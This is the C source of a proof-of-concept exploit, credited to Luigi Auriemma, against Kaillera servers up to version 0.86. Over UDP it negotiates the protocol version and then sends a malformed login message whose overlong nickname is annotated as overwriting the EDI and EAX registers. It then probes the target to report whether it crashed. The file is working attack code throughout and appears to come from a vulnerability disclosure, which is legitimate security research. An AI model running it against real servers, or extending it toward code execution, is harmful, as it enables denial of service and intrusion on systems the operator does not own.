/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif



#define VER         "0.1"
#define PORT        27888
#define BUFFSZ      0xffff
#define NICK        "nickname_aaaaaaaaaaaaaaaaaaaaaaa"  \
                    "bbbb"  /* EDI */                   \
                    "cccc"  /* EAX */



int put08(u_char *data, int num);
int put16(u_char *data, int num);
int putsc(u_char *data, u_char *src);

void delimit(u_char *data);
int send_recv(int sd, u_char *in, int insz, u_char *out, int outsz, int err);
int timeout(int sock, int secs);
u_int resolv(char *host);
void std_err(void);



struct  sockaddr_in peer;



int main(int argc, char *argv[]) {
    float   ver  = 0.83;
    int     sd,
            seq,
            len;
    u_short port = PORT;
    u_char  *buff,
            *p,
            *t;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Kaillera <= 0.86 possible code execution "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%hu)]\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

redo:
    len = sprintf(buff, "HELLO%1.2f", ver);
    len = send_recv(sd, buff, len, buff, BUFFSZ, 1);
    if(memcmp(buff, "HELLOD00D", 9)) {
        if(!strcmp(buff, "VER")) {
            ver += 0.01;
            printf("- try version %1.2f\n", ver);
            goto redo;
        }
        printf("\nError: wrong reply from the server: %s\n\n", buff);
        exit(1);
    }

    seq = 0;
    peer.sin_port = htons(atoi(buff + 9));

    printf("- connect to port %hu\n", ntohs(peer.sin_port));

    p = buff;
    p += put08(p, 1);       // number of messages

    p += put16(p, seq++);   // sequence
    t = p;      p += 2;     // size of message
    p += put08(p, 3);       // type of message
                            // message:
    p += putsc(p, NICK);
    p += putsc(p, "emulator");
    p += put08(p, 1);

    put16(t, (p - t) - 1);

    printf(
        "- send malformed message:\n"
        "  data      = 0x%08x\n"
        "  data_size = 0x%08x\n",
        *(uint32_t *)(NICK + 32),
        *(uint32_t *)(NICK + 32 + 4));
    len = send_recv(sd, buff, p - buff, buff, BUFFSZ, 0);

    sleep(ONESEC);

    printf("- check server:\n");
    len = sprintf(buff, "HELLO%1.2f", ver);
    len = send_recv(sd, buff, len, buff, BUFFSZ, 0);
    if(len < 0) {
        printf("\n  Server IS vulenrable!!!\n\n");
    } else {
        printf("\n  Server doesn't seem vulenrable\n\n");
    }
    close(sd);
    return(0);
}



int put08(u_char *data, int num) {
    data[0] = num;
    return(1);
}



int put16(u_char *data, int num) {
    data[0] = num;
    data[1] = num >> 8;
    return(2);
}



int putsc(u_char *data, u_char *src) {
    return(sprintf(data, "%s", src) + 1);
}



void delimit(u_char *data) {
    while(*data && (*data != '\n') && (*data != '\r')) data++;
    *data = 0;
}



int send_recv(int sd, u_char *in, int insz, u_char *out, int outsz, int err) {
    int     retry,
            len;

    if(in && !out) {
        if(sendto(sd, in, insz, 0, (struct sockaddr *)&peer, sizeof(peer))
          < 0) std_err();
        return(0);

    } else if(in) {
        for(retry = 3; retry; retry--) {
            if(sendto(sd, in, insz, 0, (struct sockaddr *)&peer, sizeof(peer))
              < 0) std_err();
            if(!timeout(sd, 1)) break;
        }

        if(!retry) {
            goto timeout_received;
        }

    } else {
        if(timeout(sd, 3) < 0) {
            goto timeout_received;
        }
    }

    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0) std_err();
    return(len);

timeout_received:
    if(err) {
        printf("\nError: socket timeout, no reply received\n\n");
        exit(1);
    }
    return(-1);
}



int timeout(int sock, int sec) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec  = sec;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u_int resolv(char *host) {
    struct  hostent *hp;
    u_int   host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


